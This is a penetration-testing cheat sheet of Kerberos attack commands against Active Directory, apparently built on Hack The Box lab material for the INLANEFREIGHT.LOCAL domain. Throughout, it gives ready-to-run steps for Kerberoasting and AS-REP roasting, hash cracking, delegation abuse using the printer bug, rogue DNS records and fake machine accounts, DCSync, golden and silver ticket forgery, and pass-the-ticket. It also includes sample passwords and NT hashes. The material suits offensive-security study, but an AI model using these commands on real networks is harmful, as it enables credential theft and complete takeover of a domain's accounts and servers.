# Kerberos Attacks ## From Linux ### GetUserSPN ```bash # Request 1 Ticket GetUsersSPNs.py -dc-ip -request-user # Request All Tickets GetUsersSPNs.py -dc-ip INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs # Crack TGS Ticket hashcat -m 13100 file.tgs $ROCKYOU ``` ## From Windows ### setspn.exe ```powershell # Find Accounts with SPN setspn.exe -Q */* # Better Command setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } ``` ### Mimikatz ```powershell # Enable Base64 Output base64 /out:true # Export Tickets kerberos::list /export # Modify To Better Format echo "" | tr -d \\n # Output To John Format cat encoded_file | base64 -d > sqldev.kirbi # Make to John Format python2.7 kirbi2john.py sqldev.kirbi # HashCat Way, Modify to hashcat format sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' ``` ### PowerView ```powershell # Import Module Import-Module .\PowerView.ps1 # List Users With SPN Get-DomainUser * -spn | select samaccountname # Target Single User + Hashcat Output Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat ``` ### Rubeus ```powershell # /Stats .\Rubeus.exe kerberoast /stats # List Admin Privileges Users for Kerberoasting .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap ``` ### Double Hop Workarounds #### Method 1: PSCredential Object ```powershell # Set password $SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force # Set Proper Login $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword) # Use Command with Credentials get-domainuser -spn -credential $Cred | select samaccountname ``` #### Method 2: Register PSSession Configuration ```powershell # Check HTTP Ticket Present klist # Configure PSSession Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm # Connect Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess ``` ## Roasting Attacks ### AS-REPRoasting (Windows) #### AS-REP Roasting Enumeration ```powershell # PowerView: Discover Account with Pre-Authentication Disbaled Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol # Rubeus: Enumerate all user Accounts for Pre-Authentication Rubeus.exe asreproast /format:hashcat ``` #### Performing AS-REPRoasting ```powershell # Rubeus .\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt # Crack the Hash hashcat.exe -m 18200 hashes $ROCKYOU ``` #### Set DONT\_REQ\_PREAUTH (PowerView) ```powershell Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose ``` ### AS-REPRoasting (LInux) #### AS-REPRoasting Users Enumeration ```bash GetNPUsers.py inlanefreight.local/pixis -request ``` #### Find Accounts Without Authentication ```bash GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass ``` ### Kerberoasting (Windows) #### Manual Detection (PowerShell Script) ```powershell $search = New-Object DirectoryServices.DirectorySearcher([ADSI]"") $search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" $results = $search.Findall() foreach($result in $results) { $userEntry = $result.GetDirectoryEntry() Write-host "User" Write-Host "====" Write-Host $userEntry.name "(" $userEntry.distinguishedName ")" Write-host "" Write-host "SPNs" Write-Host "====" foreach($SPN in $userEntry.servicePrincipalName) { $SPN } Write-host "" Write-host "" } # Run Script .\FindSPNAccounts.ps1 ``` #### Find Accounts with SPN (PowerView) ```powershell # Find Accounts Get-DomanUser -SPN | select samaccountname, serviceprincipalname,memberof ``` #### Invoke Kerberoasting (PowerView) ```powershell Invoke-Kerberoast ``` #### Rubeus Kerberoasting ```powershell Rubeus.exe kerberoast /nowrap ``` #### Kerberoasting Without Account Password In order to perform this attack, we need the following: 1. Username of an account with pre-authentication. 2. A target SPN. ```powershell Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap ``` ### Kerberoasting (Linux) **Get Account SPN** ```bash GetUserSPNs.py inlanefreight.local/pixis -request ``` ## Unconstrained Delegation ### Unconstrained Delegation - Computer #### Method 1 (Waiting Authentication) **1 Monitor Stored Tickets (Rubeus)** ```powershell .\Rubeus.exe monitor /interval:5 /nowrap ``` **2 Using Captured Ticket to Request Another Ticket** ```powershell .\Rubeus.exe asktgs /ticket: /service:cifs/dc01.INLANEFREIGHT.local /ptt ``` **3 Using Newly ticket** ```powershell dir \\dc01.inlanefreight.local\c$ ``` #### Method 2 (Printer Bug) **1 Monitor Tickets** ```powershell .\Rubeus.exe monitor /interval:5 /nowrap ``` **2 Abusing Printer Bug** ```powershell .\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local ``` #### 3 Captare & Renew Ticket ```powershell # Once Intercepted, we need to renew the ticket .\Rubeus.exe renew /ticket: /ptt ``` #### 4 DcSync ```powershell # Since we haveTicket from dc01 and can dump all the hashes lsadump::dcsync ``` #### 5 Using NT Hash ```powershell # With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT .\Rubeus.exe asktgt /rc4: /user: /ptt # Perform Actions on DC01 dir \\dc01.inlanefreight.local\c$ ``` ### Unconstrained Delegation - Users #### Gather Unconstrained Delegation Users (Powerview) ```powershell Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol ``` #### 1 Create Fake DNS Record ```bash # Host DNS Server python dnstool.py -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207 ``` #### 2 Verify DNS ```bash nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local ``` #### 3 Craft SPN ```bash python addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local ``` #### 4 Decrypt Ticket ```bash sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58 ``` #### 5 Leveraging Printer Bug ```bash python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 fakepcs.inlanefreight.local ``` #### 6 Perform Attack ```bash sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58 ``` #### 7 Export ccache + Secrets Dump ```bash export KRB5CCNAME= secretsdump.py -k -no-pass dc01.inlanefreight.local ``` ## Constrained Delegation ### Constrained Delegation (Windows) #### Gather Constrained Delegation Computers ```powershell Get-DomainCoputer -TrustedAuth | select serviceprincipalname,dnshostname,useraccountcontrol ``` #### 1 Get Machine Hash (Mimikatz) ```powershell .\mimikatz.exe privilege::debug sekurlsa::msv exit ``` #### 2 Constrained Delegation Attack ```powershell # Need Machine Hash as rc4 .\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt # Verify Ticket klist # Enter Session Enter-PSSession ws01.inlanefreight.local ``` ### Constrained Delegation (Linux) #### 1 Find Delegation Accounts ```bash findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine ``` #### 2 Craft Valid TGS Ticket ```bash getST.py -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator ``` #### 3 Login With TGS Ticket ```bash # Export ccache export KRB5CCNAME= # Login psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug ``` ### Resource Based Delegation (Windows) #### Enumerate RBCD Script ```powershell # import the PowerView module Import-Module C:\Tools\PowerView.ps1 # get all computers in the domain $computers = Get-DomainComputer # get all users in the domain $users = Get-DomainUser # define the required access rights $accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl" # loop through each computer in the domain foreach ($computer in $computers) { # get the security descriptor for the computer $acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs # loop through each user in the domain foreach ($user in $users) { # check if the user has the required access rights on the computer object $hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))} if ($hasAccess) { Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)" } } } ``` #### 1 Create Fake Computer ```powershell # Import PowerMad Import-Module .\Powermad.ps1 # Add New Computer New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force) ``` #### 2 Modify Attributes Created Computer 1. Obtain Computer SID. 2. Use SDDL to create a security descriptor 3. Set `msDS-AllowedToActOnBehalfOfOtherIdentity` in raw binary format. 4. Modify the target computer. ```powershell # Import PowerView Import-Module .\PowerView.ps1 # Step 1 $ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid # Step 2 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Step 3 $credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force) # Step 4 Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose ``` #### 3 Get Computer Hash ```powershell .\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local ``` #### 4 Request TGS Ticket ```powershell # /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm .\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt # Connect to DC ls \\dc01.inlanefreight.local\c$ ``` ### Resource Based Delegation (Linux) #### 1 Create a New Computer ```bash addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+\! -dc-ip 10.129.96.44 inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd' ``` #### 2 Add Computer to Trusted List ```bash python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses' ``` #### 3 Request TGS Ticket ```bash getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 inlanefreight.local/HACKTHEBOX:Hackthebox123+\! ``` #### 4 Export ccache & Login ```bash # Export ccache export KRB5CCNAME= # psexec psexec.py -k -no-pass dc01.inlanefreight.local ``` ## Ticket Abuse ### Golden Ticket (Windows) We need 4 elements in order to perform a Golden Ticket attack. 1. Domain Name 2. Domain SID 3. KRBTGT's Hash 4. Username to impersonate #### 1 Gather Domain Name ```powershell Get-Domain ``` #### 2 Gather Domain SID ```powershell Get-DomainSID ``` #### 3 Gather krbtgt Hash ```powershell .\mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit ``` #### 4 Forge Golden Ticket ```powershell .\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit" ``` #### 5 Login ```powershell Enter-PSSession dc01 ``` ### Golden Ticket (Linux) #### 1 Gather Domain (SID) ```bash lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids ``` #### 2 Create Golden Ticket ```bash ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator ``` #### 3 Importing and Use Ticket ```bash export KRB5CCNAME= # Login psexec.py -k -no-pass dc01.inlanefreight.local ``` ### Silver Ticket (Windows) #### 1 Gather Domain SID ```powershell Get-DomainSid ``` #### 2 Compromised Service Account ```powershell Without this account, a silver ticket is not possible ``` #### 3 Forge Silver Ticket ```powershell .\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ptt" "exit" ``` #### Create Sacrificial Process ```powershell # Create Process Rubeus.exe createnetonly /program:cmd.exe /show # Import Silver Ticket Rubeus.exe ptt /ticket:sql01.kirbi # Login PSExec.exe -accepteula \\sql01.inlanefreight.local cmd ``` ### Silver Ticket (Linux) #### 1 Retrieve Domain SID ```bash lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids ``` #### 2 Create Silver Ticket ```bash ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator ``` #### 3 Export ccache ```bash export KRB5CCNAME= # Login smbclient.py -k -no-pass sql01.inlanefreight.local ``` ### Pass The Ticket Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement. #### 1 Create Sacrificial Process ```powershell .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show ``` #### 2 Read Tickets ```powershell .\rubeus.exe triage ``` #### 3 Extract Ticket With Rubeus ```powershell # krbtgt/INLANEFREIGHT.LOCAL .\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap ``` #### 4 Renew Ticket ```powershell Rubeus.exe renew /ticket: /ptt ``` #### 4 Read Files ```powershell dir \\dc01\\c$ ```